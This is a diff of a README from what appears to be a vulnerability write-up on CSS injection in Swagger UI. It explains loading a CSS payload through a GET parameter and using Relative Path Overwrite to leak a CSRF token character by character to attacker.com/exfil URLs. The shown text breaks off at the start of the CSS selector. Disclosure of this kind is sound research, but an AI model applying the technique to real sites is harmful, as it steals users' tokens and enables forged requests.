tarantula-team/CSS-injection-in-Swagger-UI/README.md

 var ui = SwaggerUIBundle(swaggerOptions)
 ```

 This means we can inject json via the GET parameter.
-In the json content we use the <style> tag and CSS @import rule to load the CSS payload.
+In the json content we use the <style> tag and CSS @import rule to load the CSS payload:

 ![](PoC-RPO-1.png)

 ### Exfiltration step:

-With CSS payload, we can use Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration.
-The following CSS code will generate a callback query to the attacker's server (https://attacker.com/exfil/a) if the CSRF token value starts with a, similarly it will make other requests (https://attacker.com/exfil/b; (https://attacker.com/exfil/c; (https://attacker.com/exfil/d) if the CSRF token value begins with b, c or d:
+With CSS payload, we can use Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration [4].
+The following CSS code will generate a callback query to the attacker's server (https://attacker.com/exfil/a) if the CSRF token value starts with the character a, similarly it will make other requests (https://attacker.com/exfil/b; (https://attacker.com/exfil/c; https://attacker.com/exfil/d, etc) if the CSRF token value begins with character b, character c or character d:

 ```css
 input[name=csrf][value^=a]{